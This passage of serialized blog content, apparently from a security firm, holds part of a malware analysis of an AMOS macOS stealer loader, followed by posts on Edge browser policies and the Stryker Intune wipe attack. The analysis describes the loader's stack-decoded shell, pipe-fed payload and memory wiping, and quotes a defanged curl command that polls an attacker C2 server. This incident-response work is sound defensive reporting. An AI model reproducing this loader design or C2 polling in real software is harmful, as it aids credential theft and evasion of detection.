Pipe. Es gibt kein Zeitfenster, nicht einmal eine Mikrosekunde, in dem der entschlüsselte Payload nach Abschluss der Ausführung noch im Speicher läge. Ein Live-Memory-Dump des Loader-Prozesses, der direkt nach Rückkehr dieser Funktion erstellt wird, findet nur Nullen, wo der Payload war.",[806,3403,3404,3405,3408],{},"Das wird als ",[1736,3406,3407],{},"Zero-after-use"," bezeichnet, dieselbe Technik, die hochsichere kryptografische Bibliotheken einsetzen, damit Schlüsselmaterial nicht im Speicher verbleibt. 
Dass diese Technik in Commodity-Malware auftaucht, ist ungewöhnlich und lässt auf einen Entwickler mit Security-Engineering-Hintergrund schließen.",[1671,3410,3412],{"id":3411},"die-vollständige-ausführungssequenz","Die vollständige Ausführungssequenz:",[806,3414,1677],{},[1541,3416,3417],{"style":1543},[1545,3418,3421],{"className":3419,"code":3420,"language":916},[1548],"__cstring:  \"\\x01LG@\\x01T]F\"   (7 bytes, obfuscated)\n    ↓  SIMD XOR with 0x2e (8-wide vector)\nstack:      \"/bin/zsh\\0\"         (decoded in-place, stack only)\n    ↓  _pipe() creates fd pair [read=local_60, write=local_5c]\n    ↓  _fork()\n    │\n    ├─ CHILD:  _dup2(local_60, 0)   stdin = pipe read end\n    │          _execvp(\"/bin/zsh\", [\"/bin/zsh\", \"-s\", NULL])\n    │          → /bin/zsh reads commands from stdin (= pipe)\n    │\n    └─ PARENT: loop: _write(local_5c, payload, variable_chunk)\n                     _usleep(1)\n               _close(local_5c)    close write end → EOF to shell\n               _bzero(payload, len) ← WIPE IMMEDIATELY\n               _waitpid(child, ...)\n",[1524,3422,3420],{"__ignoreMap":863},[810,3424,3426],{"id":3425},"die-import-tabelle-als-waffe","Die Import-Tabelle als Waffe",[806,3428,1536],{},[806,3430,3431],{},"Die vollständige Import-Tabelle dieser Binary:",[1541,3433,3434],{"style":1543},[1545,3435,3438],{"className":3436,"code":3437,"language":916},[1548],"// C runtime / memory\n_memcpy       _memmove      _memset       _bzero\n\n// Process execution\n_fork         _execvp       _execl        __exit\n\n// IPC / pipes\n_pipe         _dup2         _close        _write\n\n// Synchronisation\n_waitpid      _usleep\n\n// Stack protection\n___stack_chk_fail    ___stack_chk_guard\n\n// C++ runtime\noperator.new    operator.delete    __Unwind_Resume\n___cxa_allocate_exception    ___cxa_throw    ___cxa_begin_catch\n___cxa_end_catch    ___cxa_free_exception    ___gxx_personality_v0\nterminate    logic_error    bad_array_new_length    
__next_prime\n\n// STL containers\nappend    reserve    push_back    operator=\n\n// Dynamic linking\ndyld_stub_binder\n",[1524,3439,3437],{"__ignoreMap":863},[806,3441,3442],{},"Insgesamt 27 Symbole. Was fehlt, ist mindestens so aufschlussreich wie das, was vorhanden ist.",[1671,3444,3446],{"id":3445},"abwesend-netzwerk","Abwesend: Netzwerk",[806,3448,1677],{},[1541,3450,3451],{"style":1543},[1545,3452,3455],{"className":3453,"code":3454,"language":916},[1548],"socket      connect     bind        listen\naccept      send        recv        sendto\nrecvfrom    getaddrinfo gethostbyname\n",[1524,3456,3454],{"__ignoreMap":863},[1671,3458,3460],{"id":3459},"abwesend-dateisystem","Abwesend: Dateisystem",[806,3462,1677],{},[1541,3464,3465],{"style":1543},[1545,3466,3469],{"className":3467,"code":3468,"language":916},[1548],"open        read        fopen       fread\nfwrite      fclose      stat        unlink\nmkdir       rename      opendir     readdir\n",[1524,3470,3468],{"__ignoreMap":863},[1671,3472,3474],{"id":3473},"abwesend-prozess-introspektion","Abwesend: Prozess-Introspektion",[806,3476,1677],{},[1541,3478,3479],{"style":1543},[1545,3480,3483],{"className":3481,"code":3482,"language":916},[1548],"getpid      getuid      getenv      sysctl\n",[1524,3484,3482],{"__ignoreMap":863},[1671,3486,3488],{"id":3487},"abwesend-kryptografie","Abwesend: Kryptografie",[806,3490,1536],{},[1541,3492,3493],{"style":1543},[1545,3494,3497],{"className":3495,"code":3496,"language":916},[1548],"CCCrypt     SecItemAdd  SecKeychainFind\n",[1524,3498,3496],{"__ignoreMap":863},[806,3500,3501,3502,2289,3505,3508,3509,2289,3512,3515],{},"Bei einem traditionellen Malware-Sample erwartet man Netzwerk-Imports (",[1524,3503,3504],{},"socket",[1524,3506,3507],{},"connect",") oder Datei-Imports (",[1524,3510,3511],{},"fopen",[1524,3513,3514],{},"write","). Diese Binary hat keinen einzigen. 
Für einen Standard-Scanner sieht sie aus wie ein harmloser Prozess-Launcher, und das ist so geplant: eine bewusste Architekturentscheidung, die statische Analysetools ins Leere laufen lässt.",[806,3517,1884,3518,3520],{},[1524,3519,1887],{},"-Binary führt den Diebstahl nicht selbst durch. Ihr einziger Zweck ist es, den eigentlichen bösartigen Payload, ein stark obfuskiertes AppleScript, abzusetzen und auszuführen. Ein EDR oder AV, das nach bösartigen Binaries sucht, sieht hier einen Loader ohne Netzwerk- oder Datei-I/O und stuft ihn möglicherweise als sauber ein, ohne zu erkennen, dass die Binary ein spezialisiertes Zustellsystem für einen High-Level-Skript-Payload ist.",[1508,3522],{},[1511,3524,3526],{"id":3525},"die-backdoor","Die Backdoor",[806,3528,816],{},[806,3530,3531,3532,3535],{},"Der Incident endete nicht nach der initialen Kompromittierung. Microsoft Defender-Telemetrie zeigte einen Prozess, der von ",[1524,3533,3534],{},"/Users/\u003Credacted>/.mainhelper"," aus lief und einen externen Server abfragte:",[1541,3537,3538],{"style":1543},[1545,3539,3541],{"className":1747,"code":3540,"language":1749,"meta":863,"style":863},"sh -c \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[1524,3542,3543],{"__ignoreMap":863},[1588,3544,3545,3548,3550],{"class":1590,"line":1591},[1588,3546,3547],{"class":1756},"sh",[1588,3549,1761],{"class":1760},[1588,3551,3552],{"class":1774}," \"curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'\"\n",[806,3554,3555],{},"Der Base64-String dekodierte sich zu einer 16-Byte-Geräte-UUID, dem eindeutigen Identifier, den die C2-Infrastruktur des Angreifers diesem Gerät am Tag der Erstinfektion zugewiesen hatte.",[806,3557,1884,3558,3561,3562,3565,3566,3568],{},[1524,3559,3560],{},".mainhelper","-Binary (SHA-256: ",[1524,3563,3564],{},"7c6766e2b05dfbb286a1ba48ff3e766d4507254e217e8cb77343569153d63063",") war am Tag des Incidents durch den osascript-Dropper via ",[1524,3567,1757],{}," installiert 
worden.",[1508,3570],{},[1511,3572,3574],{"id":3573},"die-stärke-des-kollektiven-schilds-unsere-shared-threat-intelligence-plattform","Die Stärke des kollektiven Schilds: Unsere Shared-Threat-Intelligence-Plattform",[806,3576,816],{},[806,3578,3579],{},"Wenn in unserem SOC ein Alert ausgelöst wird, beginnt die Uhr nicht nur für den betroffenen Kunden zu laufen, sondern für jede Organisation unter dem glueckkanja-Schutzschild. Diese Untersuchung einer undokumentierten AMOS-Variante macht deutlich, was die Intelligence Gap in der Praxis bedeutet: ein gefährliches Zeitfenster, in dem klassische Anbieter blind sind, weil sie die Bedrohung noch nicht gesehen haben.",[806,3581,3582],{},"Hier zeigt unsere proprietäre Shared Threat Intelligence Platform ihren Wert, entwickelt exklusiv für glueckkanja-CSOC-Kunden. Wir warten nicht auf Branchen-Updates, wir erzeugen sie. Während unsere Analysten noch die letzten Schichten des ARM64-Assembly demontierten, verteilte unsere Automated Orchestration Engine bereits die extrahierten Indikatoren über unser gesamtes Ökosystem. Das erzeugt Herd-Immunität: Was an einem einzigen Endpoint entdeckt wird, ist innerhalb von Minuten eine blockierte Bedrohung für jede Organisation unter unserem Schutz.",[806,3584,3585],{},"Reaktive Sicherheit funktioniert nicht gegen Bedrohungen, die gezielt durch die Lücken konventioneller Abwehrmechanismen schlüpfen. Die Antwort liegt in der Verbindung menschlicher Expertise mit einer Architektur, die dieses Wissen sofort und skaliert einsetzt. Durch unser Shared-Intelligence-Modell kehrt sich der Zeitvorteil des Angreifers um: Unsere Kunden sind geschützt, bevor die Bedrohung von der Branche überhaupt erkannt wird.",[3587,3588,3589,3594,3597,3600],"blockquote",{},[806,3590,3591],{},[1736,3592,3593],{},"Hinweis zum Datenschutz",[806,3595,3596],{},"Identifizierende Informationen wurden in dieser Veröffentlichung anonymisiert. 
Spezifische technische Details, Indikatoren und Zeitstempel können leicht verändert worden sein, um den laufenden Schutz der betroffenen Umgebung zu gewährleisten, ohne die technische Integrität der Analyse zu beeinträchtigen.",[806,3598,3599],{},"Die technischen Analysen und Indicators of Compromise (IOCs) in diesem Bericht dienen ausschließlich der Information und Weiterbildung. Sie werden nach bestem Wissen bereitgestellt. glueckkanja AG übernimmt keine ausdrücklichen oder impliziten Garantien hinsichtlich Vollständigkeit oder Genauigkeit und haftet nicht für Schäden, Verluste oder Sicherheitsvorfälle, die aus der Verwendung der hier geteilten Informationen, Regeln oder Signaturen entstehen. Wir empfehlen, alle Indikatoren und Regeln vor dem Einsatz in einer kontrollierten Umgebung zu validieren.",[806,3601,3602],{},"Beschriebene Indikatoren und Techniken können sich mit bekannten Malware-Familien überschneiden und sind nicht exklusiv einer einzelnen Kampagne zuzuordnen.",[3604,3605,3606],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki 
.sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}",{"title":863,"searchDepth":864,"depth":864,"links":3608},[3609,3610,3611,3612,3619,3620,3621,3622,3630,3637],{"id":1532,"depth":864,"text":1533},{"id":1571,"depth":864,"text":1572},{"id":1631,"depth":864,"text":1632},{"id":1663,"depth":864,"text":1664,"children":3613},[3614,3615,3616,3617,3618],{"id":1673,"depth":1814,"text":1674},{"id":1688,"depth":1814,"text":1689},{"id":1702,"depth":1814,"text":1703},{"id":1711,"depth":1814,"text":1712},{"id":1728,"depth":1814,"text":1729},{"id":1894,"depth":864,"text":1895},{"id":1984,"depth":864,"text":1985},{"id":2100,"depth":864,"text":2101},{"id":2171,"depth":864,"text":2172,"children":3623},[3624,3625,3626,3627,3628,3629],{"id":2186,"depth":1814,"text":2187},{"id":2475,"depth":1814,"text":2476},{"id":2730,"depth":1814,"text":2731},{"id":2925,"depth":1814,"text":2926},{"id":3012,"depth":1814,"text":3013},{"id":3164,"depth":1814,"text":3165},{"id":3218,"depth":864,"text":3219,"children":3631},[3632,3633,3634,3635,3636],{"id":3234,"depth":1814,"text":3235},{"id":3300,"depth":1814,"text":3301},{"id":3342,"depth":1814,"text":3343},{"id":3384,"depth":1814,"text":3385},{"id":3411,"depth":1814,"text":3412},{"id":3425,"depth":864,"text":3426,"children":3638},[3639,3640,3641,3642],{"id":3445,"depth":1814,"text":3446},{"id":3459,"depth":1814,"text":3460},{"id":3473,"depth":1814,"text":3474},{"id":3487,"depth":1814,"text":3488},{"lang":4,"seoTitle":3644,"titleClass":873,"date":3645,"categories":3646,"blogtitlepic":3647,"socialimg":3648,"customExcerpt":3649,"keywords":3650,"maxContent":508,"asideNav":3651,"
footer":3666,"contactInContent":3667,"published":508,"hreflang":3698},"AMOS-Stealer-Variante: Reverse Engineering einer unbekannten macOS-Malware","2026-04-10",[371],"head-amos-stealer.png","/blog/heads/head-amos-stealer.png","Eine bisher undokumentierte AMOS-Stealer-Variante kompromittierte einen macOS-Endpoint. Keine bekannten Hashes, keine C2-Daten in öffentlichen Datenbanken. Unser SOC demontierte sechs Obfuskierungsschichten, extrahierte alle Indikatoren und verteilte den Schutz an alle SOC-Kunden innerhalb von Stunden, noch bevor die Branche das Sample überhaupt gesehen hatte.","AMOS Stealer, macOS Malware, Reverse Engineering, Malware-Analyse, Ghidra, ARM64, Incident Response, Threat Intelligence, CSOC, macOS-Sicherheit, Stealer-Malware, Shared Threat Intelligence, Atomic macOS Stealer",{"menuItems":3652},[3653,3656,3658,3661,3663],{"href":3654,"text":3655},"#der-vorfall-ein-unbekanntes-ioc-szenario","Der Vorfall",{"href":3657,"text":1533},"#stage-1-sandbox-pruefungen",{"href":3659,"text":3660},"#stage-2-reverse-engineering-der-helper-binary","Stage 2: Binary-Analyse",{"href":3662,"text":3526},"#die-backdoor",{"href":3664,"text":3665},"#die-staerke-des-kollektiven-schilds-unsere-shared-threat-intelligence-plattform","Shared Threat Intelligence",{"noMargin":508},{"quote":508,"infos":3668},{"bgColor":883,"headline":3669,"subline":3670,"level":810,"textStyling":887,"flush":888,"person":3671,"form":3676},"Kontakt aufnehmen","Wollt ihr wissen, wie unsere Shared Threat Intelligence Platform euch vor unbekannten Malware-Varianten schützt, noch bevor die Branche davon erfährt? Sprecht uns an.",{"image":3672,"cloudinary":508,"alt":3673,"name":1127,"quotee":1127,"quoteeTitle":3674,"quote":3675},"/people/people-jan-geisbauer-csoc.jpg","Porträt von Jan Geisbauer, Head of Security bei glueckkanja","Head of Security","Das Gefährliche an dieser Variante war nicht die technische Komplexität, so beeindruckend sie auch ist. Gefährlich war das Zeitfenster. 
Ohne Shared Threat Intelligence hätten unsere anderen Kunden stundenlang ungeschützt dagestanden, während wir noch analysierten.",{"ctaText":905,"cta":3677,"method":870,"action":908,"fields":3678},{"skin":907},[3679,3680,3682,3684,3686,3689,3691,3692,3693,3695,3696,3697],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":3681},"Bitte gebt euren Namen ein.",{"label":920,"type":916,"id":612,"required":508,"requiredMsg":3683},"Bitte gebt euer Unternehmen ein.",{"label":923,"type":924,"id":924,"required":508,"requiredMsg":3685},"Bitte gebt eure E-Mail-Adresse ein.",{"label":3687,"type":928,"id":929,"required":749,"requiredMsg":3688},"Eure Nachricht an uns","Bitte gebt eine Nachricht ein.",{"label":3690,"type":933,"id":934,"required":508,"requiredMsg":935},"Eure Daten werden bei uns zum Zweck der Bearbeitung und Beantwortung eurer Anfrage gespeichert. Weitere Informationen zum Datenschutz findet ihr in unserer \u003Ca href=\"/de/privacy\">Datenschutzerklärung\u003C/a>.",{"type":911,"id":937,"value":371},{"type":911,"id":939,"value":940},{"type":911,"id":942,"value":3694},"Form: Blog AMOS Stealer CSOC | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"type":911,"id":950},[3699,3701,3703],{"lang":953,"href":3700},"/en/posts/2026-04-10-incident-to-intelligence",{"lang":4,"href":3702},"/de/posts/2026-04-10-incident-to-intelligence",{"lang":956,"href":3704},"/es/posts/2026-04-10-incident-to-intelligence","/posts/2026-04-10-incident-to-intelligence",{"title":1494,"description":1500},"posts/2026-04-10-incident-to-intelligence",[3709,3710,3711,3712,3713],"Threat Intelligence","Incident Response","macOS Security","Malware Analysis","Cyber Security Operations 
Center","UOEeAiDWvGEnldyGolhkHvB5w7KQbGJ0wkzjF62ajZs",{"id":3716,"title":3717,"author":3718,"body":3719,"cta":764,"description":3723,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":3919,"moment":3921,"navigation":508,"path":3947,"seo":3948,"stem":3949,"tags":764,"webcast":749,"__hash__":3950},"content_de/posts/2026-03-21-microsoft-edge-corporate-browser.md","Warum Edge euer einziger Corporate Browser sein sollte",[1023],{"type":803,"value":3720,"toc":3911},[3721,3724,3728,3730,3736,3740,3742,3745,3749,3751,3754,3769,3773,3775,3781,3787,3790,3832,3840,3844,3846,3854,3873,3877,3879,3882,3908],[806,3722,3723],{},"Die Wahl des Browsers ist in Unternehmensumgebungen eine strategische Entscheidung: Sie beeinflusst direkt, wie viel Sicherheit und Verwaltungsaufwand ihr tatsächlich habt. Google Chrome war lange die naheliegende Option, aber Microsoft Edge hat sich zu einem Browser entwickelt, der direkt in den bestehenden Stack greift, vor allem wenn Microsoft 365 im Einsatz ist und die Verwaltung über Intune läuft.",[810,3725,3727],{"id":3726},"sicherheit","Sicherheit",[806,3729,816],{},[806,3731,3732,3733,3735],{},"Ein verwalteter Microsoft Edge Browser sorgt dafür, dass Schutzfunktionen konsistent auf allen Endgeräten greifen. Mit nativer Integration in Microsoft Defender SmartScreen schützt Edge vor Phishing, Malware und weiteren Bedrohungen. Über Intune lassen sich Richtlinien eng fassen: Verhalten steuern, riskante Erweiterungen blockieren, sicheres Browsen durchsetzen. glueckkanja's ",[833,3734,45],{"href":46}," liefert aktuelle Edge-Richtlinien, die an Microsofts Security-Baselines ausgerichtet sind.",[810,3737,3739],{"id":3738},"synchronisation-mit-entra-id","Synchronisation mit Entra ID",[806,3741,816],{},[806,3743,3744],{},"Edge synchronisiert Benutzerdaten wie Favoriten, Passwörter und Einstellungen sicher über Entra ID-Konten geräteübergreifend. 
Das ist besonders relevant in hybriden Arbeitsumgebungen, wo Mitarbeitende zwischen Unternehmensgeräten, virtuellen Desktops und mobilen Geräten wechseln, ohne dabei Kontext oder Produktivität zu verlieren.",[810,3746,3748],{"id":3747},"komplexität-durch-mehrere-browser","Komplexität durch mehrere Browser",[806,3750,816],{},[806,3752,3753],{},"Wer Google Chrome parallel zu Edge betreibt, schafft sich Mehrarbeit:",[2738,3755,3757,3763],{"style":3756},"margin: 0.25rem 0",[2741,3758,3759,3762],{},[1736,3760,3761],{},"Backup und Sync:"," Andere Browser erfordern häufig Drittanbieter-Konten, etwa ein Google-Konto, um die Synchronisierung zu ermöglichen.",[2741,3764,3765,3768],{},[1736,3766,3767],{},"Richtlinienpflege:"," Jeder Browser braucht ein eigenes Set an Sicherheits- und Konfigurationsrichtlinien. Das bindet Ressourcen, erhöht das Risiko von Fehlkonfigurationen und erschwert Audits.",[810,3770,3772],{"id":3771},"chrome-umleitung-via-intune","Chrome-Umleitung via Intune",[806,3774,816],{},[806,3776,3777,3778,3780],{},"Für die Umleitung von Chrome auf Edge gibt es eine fertige Richtlinie, die sich mit glueckkanja's ",[833,3779,45],{"href":46}," in wenigen Minuten einrichten lässt. 
Nutzer landen auf einer Seite, die Microsoft Edge als Standard-Corporate-Browser vorstellt, mit einem direkten Link zum Öffnen.",[806,3782,3783],{},[1449,3784],{"alt":3785,"src":3786},"Microsoft Edge als Standard-Corporate-Browser","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsoft-edge-default-browser.png",[806,3788,3789],{},"Die Konfigurationsrichtlinie regelt, wie Chrome eingeschränkt und umgeleitet wird:",[2738,3791,3792,3805,3814,3820,3826],{"style":3756},[2741,3793,3794,3797,3798,3801,3802,2786],{},[1736,3795,3796],{},"URL-Zulassungsliste:"," Nur bestimmte URLs sind erlaubt, etwa die Landingpage ",[1524,3799,3800],{},"https://edge.glueckkanja.com/"," und der Moniker ",[1524,3803,3804],{},"microsoft-edge:*",[2741,3806,3807,3810,3811,3813],{},[1736,3808,3809],{},"URL-Sperrliste:"," Alle anderen URLs werden blockiert (",[1524,3812,2775],{},"), was das allgemeine Browsen in Chrome effektiv unterbindet.",[2741,3815,3816,3819],{},[1736,3817,3818],{},"Startseite und neuer Tab:"," Beide zeigen auf die Landingpage, die zur Nutzung von Edge auffordert.",[2741,3821,3822,3825],{},[1736,3823,3824],{},"Protokollverarbeitung:"," Chrome öffnet beim Klick auf URLs der Landingpage automatisch Edge.",[2741,3827,3828,3831],{},[1736,3829,3830],{},"Erweiterungskontrolle:"," Zusätzliche Einstellungen unterbinden die Installation von Erweiterungen.",[806,3833,3834,3835],{},"Beispielrichtlinie als Download: ",[833,3836,3839],{"href":3837,"rel":3838},"https://github.com/glueckkanja/edge-redirection-landingpage/tree/main/docs/policies",[1410],"Win - Default - Google Chrome - Redirect to Edge - v2.0.json",[810,3841,3843],{"id":3842},"landingpage-via-github-pages","Landingpage via GitHub Pages",[806,3845,816],{},[806,3847,3848,3849],{},"Die Seite läuft über GitHub Pages. 
Wer sie anpassen will, kann das direkt im Projekt tun: ",[833,3850,3853],{"href":3851,"rel":3852},"https://github.com/glueckkanja/edge-redirection-landingpage",[1410],"edge-redirection-landingpage",[806,3855,3856],{},[833,3857,3869],{"role":3858,"className":3859,"dataText":3864,"href":3865,"target":513,"rel":3866,"type":3868},"button",[3860,3861,3862,3863],"cta","btn","btn-primary","vue-component","Landingpage in Aktion","https://edge.glueckkanja.com",[3867],"noopener","Button",[1588,3870,3864],{"className":3871},[3872],"cta__text",[810,3874,3876],{"id":3875},"im-überblick","Im Überblick",[806,3878,816],{},[806,3880,3881],{},"Microsoft Edge bietet eine sichere, verwaltbare Browsing-Umgebung mit tiefer Integration in Microsoft 365 und ist damit die logische Wahl als Standard-Corporate-Browser. Die wichtigsten Vorteile im Überblick:",[2738,3883,3884,3887,3890,3893,3896,3899,3902,3905],{"style":3756},[2741,3885,3886],{},"Entra ID-Integration mit SSO",[2741,3888,3889],{},"Cloud-basierte Synchronisierung und Backup über Microsoft 365 auf mehreren Plattformen",[2741,3891,3892],{},"Integriertes Sicherheits-Ökosystem mit Microsoft Defender SmartScreen und Microsoft Endpoint DLP",[2741,3894,3895],{},"Unterstützung von Intune App Protection Policies",[2741,3897,3898],{},"Browser-Management über Microsoft 365 Admin Center und Intune",[2741,3900,3901],{},"Internet Explorer-Modus für Legacy-Anwendungen",[2741,3903,3904],{},"Corporate Branding",[2741,3906,3907],{},"Copilot-Integration",[806,3909,3910],{},"Wer auf Edge standardisiert, reduziert Komplexität, stärkt die Sicherheit und vereinfacht den Support. 
Den Umleitungsansatz auf weitere Browser auszuweiten liegt von hier aus nah.",{"title":863,"searchDepth":864,"depth":864,"links":3912},[3913,3914,3915,3916,3917,3918],{"id":3726,"depth":864,"text":3727},{"id":3738,"depth":864,"text":3739},{"id":3747,"depth":864,"text":3748},{"id":3771,"depth":864,"text":3772},{"id":3842,"depth":864,"text":3843},{"id":3875,"depth":864,"text":3876},{"lang":4,"seoTitle":3920,"titleClass":873,"date":3921,"blogtitlepic":3922,"socialimg":3923,"customExcerpt":3924,"keywords":3925,"hreflang":3926,"published":508,"asideNav":3933},"Microsoft Edge als gesicherter Corporate Browser: Sicherheit, Sync und Chrome-Umleitung via Intune","2026-03-21","head-microsoft-edge-default-browser.jpg","/blog/heads/head-microsoft-edge-default-browser.jpg","Kein Unternehmen hat Chrome wirklich gewählt; er war einfach da, mit eigener Sync-Logik, eigener Kontoverwaltung, eigener Richtlinienoberfläche. Microsoft Edge dagegen greift direkt in die Infrastruktur, die ohnehin schon läuft: Entra ID, Intune, Defender. 
Dieser Beitrag zeigt, wie der Wechsel aussieht, wie Chrome per Intune-Richtlinie auf eine Landingpage umgeleitet wird und was wegfällt, wenn man aufhört, zwei Browser parallel zu betreiben.","Microsoft Edge, Corporate Browser, Microsoft Intune, Entra ID, Chrome-Umleitung, Managed Intune, Browser-Richtlinie, Microsoft Defender SmartScreen, Enterprise Browser, Browser-Management, URL-Sperrliste, URL-Zulassungsliste",[3927,3929,3931],{"lang":4,"href":3928},"/de/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":953,"href":3930},"/en/posts/2026-03-21-microsoft-edge-corporate-browser",{"lang":956,"href":3932},"/es/posts/2026-03-21-microsoft-edge-corporate-browser",{"menuItems":3934},[3935,3937,3939,3941,3943,3945],{"href":3936,"text":3727},"#sicherheit",{"href":3938,"text":3739},"#synchronisation-mit-entra-id",{"href":3940,"text":3748},"#komplexität-durch-mehrere-browser",{"href":3942,"text":3772},"#chrome-umleitung-via-intune",{"href":3944,"text":3843},"#landingpage-via-github-pages",{"href":3946,"text":3876},"#im-überblick","/posts/2026-03-21-microsoft-edge-corporate-browser",{"title":3717,"description":3723},"posts/2026-03-21-microsoft-edge-corporate-browser","nk6RYmsy9aHIPrWtuCZFxqzG4PVOnBoAgI-NYSTo3pM",{"id":3952,"title":3953,"author":3954,"body":3955,"cta":764,"description":3959,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":4199,"moment":4201,"navigation":508,"path":4256,"seo":4257,"stem":4258,"tags":4259,"webcast":749,"__hash__":4262},"content_de/posts/2026-03-20-stryker-attack-intune-privilege.md","Ein Admin-Konto war alles, was es brauchte.",[1127],{"type":803,"value":3956,"toc":4187},[3957,3960,3963,3967,3969,3972,3975,3979,3981,3984,3987,3990,3993,3997,3999,4002,4005,4009,4011,4014,4017,4020,4024,4026,4029,4035,4039,4041,4047,4050,4053,4056,4063,4066,4072,4081,4085,4087,4093,4096,4105,4108,4111,4114,4117,4120,4123,4127,4129,4132,4135,4138,4146,4149,4152,4156,4158],[806,3958,3959],{},"Mittwoch, 11. März 2026. 
Mitarbeiter in Stryker-Büros in 79 Ländern schalteten ihre Computer ein und fanden sie leer. Login-Bildschirme ersetzt durch ein Logo. Firmen-Laptops, Diensthandys, private Geräte, die im BYOD-Programm des Unternehmens registriert waren – alle gleichzeitig gelöscht, über Nacht. Keine Ransomware, keine Malware-Signaturen, nichts, das ein Endpoint-Detection-Tool hätte erkennen können.",[806,3961,3962],{},"Der Angreifer, eine pro-iranische Hacktivistengruppe namens Handala, hatte Strykers eigene IT-Management-Infrastruktur zur Waffe gemacht.",[810,3964,3966],{"id":3965},"was-wirklich-passiert-ist","Was wirklich passiert ist",[806,3968,816],{},[806,3970,3971],{},"Der Kern des Angriffs war kein ausgefeilter Exploit und keine Zero-Day-Schwachstelle, sondern etwas weitaus Einfacheres und weitaus Häufigeres: Ein Administrator-Konto wurde kompromittiert, und dieses Konto hatte Zugang zu Microsoft Intune.",[806,3973,3974],{},"Laut Berichten von BleepingComputer wurden etwa 80.000 Geräte zwischen 5:00 und 8:00 Uhr UTC gelöscht. Handala behauptete, die Zahl habe 200.000 überschritten, darunter Server und mobile Geräte im globalen Betrieb des Unternehmens in 79 Ländern. Ein Angriff, ausgeführt ausschließlich über eine legitime Management-Konsole.",[810,3976,3978],{"id":3977},"warum-dieser-angriff-erfolgreich-war","Warum dieser Angriff erfolgreich war",[806,3980,816],{},[806,3982,3983],{},"Es gibt ein strukturelles Problem an der Wurzel dieses Vorfalls, das nicht spezifisch für Stryker ist. Es betrifft die meisten Unternehmen.",[806,3985,3986],{},"Die meisten Organisationen behandeln administrative Aufgaben und die tägliche Arbeit als Aktivitäten, die auf demselben Gerät unter derselben Benutzeridentität problemlos koexistieren können. 
Ein IT-Administrator beantwortet E-Mails, surft im Internet, klickt gelegentlich auf einen Link und verwaltet von derselben Sitzung auf demselben Gerät aus Cloud-Infrastruktur, genehmigt Zugriffsänderungen oder berührt, wie in diesem Fall, eine Geräteverwaltungskonsole mit der Berechtigung, die gesamte Geräteflotte zu löschen.",[806,3988,3989],{},"Das ist die Angriffsfläche. Wenn der alltägliche Arbeitskontext und der privilegierte Administrationskontext einen gemeinsamen Endpunkt und eine gemeinsame Identität teilen, ist jede Kompromittierung dieses Endpunkts automatisch eine Kompromittierung von allem, was diese Identität erreichen kann. Phishing, Credential-Diebstahl über Infostealer-Malware, Adversary-in-the-Middle (AiTM) Session-Token-Diebstahl – all das wird zu einem direkten Pfad zu den mächtigsten Kontrollen in der Umgebung. Keine Privilege-Eskalation erforderlich. Der Angreifer nutzt einfach das, was bereits vorhanden ist.",[806,3991,3992],{},"Im Fall von Stryker umfasste dieser Zugang einen Intune-Tenant, der Geräte auf sechs Kontinenten verwaltete.",[810,3994,3996],{"id":3995},"cisa-hat-genug-gesehen","CISA hat genug gesehen",[806,3998,816],{},[806,4000,4001],{},"Das Ausmaß und die Dreistigkeit des Angriffs lösten eine ungewöhnliche Reaktion aus: CISA, die US-amerikanische Cybersecurity and Infrastructure Security Agency, veröffentlichte Leitlinien, die direkt das Risiko kompromittierter Geräteverwaltungsplattformen adressieren. Die Behörde bestätigte, dass sie den Angriffsvektor kannte, und forderte Organisationen auf, konkrete Maßnahmen zu ergreifen – sicherzustellen, dass hochriskante Intune-Funktionen wie das Löschen von Geräten die Genehmigung eines zweiten Administrators erfordern, bevor sie ausgeführt werden.",[806,4003,4004],{},"Das ist ein seltenes und bedeutsames Signal. Wenn eine Bundesbehörde für Sicherheit unmittelbar nach einem konkreten Vorfall gezielte Leitlinien herausgibt, ist die Botschaft klar: Das ist kein Randfall. 
Das ist ein Muster, und andere Organisationen sind mit hoher Wahrscheinlichkeit demselben Risiko ausgesetzt.",[810,4006,4008],{"id":4007},"trennung-ist-kein-luxus-sie-ist-die-kontrolle","Trennung ist kein Luxus. Sie ist die Kontrolle.",[806,4010,816],{},[806,4012,4013],{},"Der Stryker-Angriff zeigt in aller Deutlichkeit, welches Ausmaß ein flaches Privilege-Modell haben kann. Der Angreifer musste keine Privilegien durch eine Kette von Schwachstellen eskalieren. Er erlangte Zugang zu Anmeldedaten oder einem Session-Token auf einer Ebene und stellte fest, dass diese Ebene bereits ausreichte, um katastrophalen, globalen, irreversiblen Schaden zu verursachen.",[806,4015,4016],{},"Die architektonische Antwort auf dieses Problem hat einen Namen: das Microsoft Enterprise Access Model (EAM). Sein Kernprinzip ist die gestaffelte Administration: Privilegierte Operationen werden mit dedizierten Konten und dedizierten Geräten durchgeführt, strikt vom alltäglichen 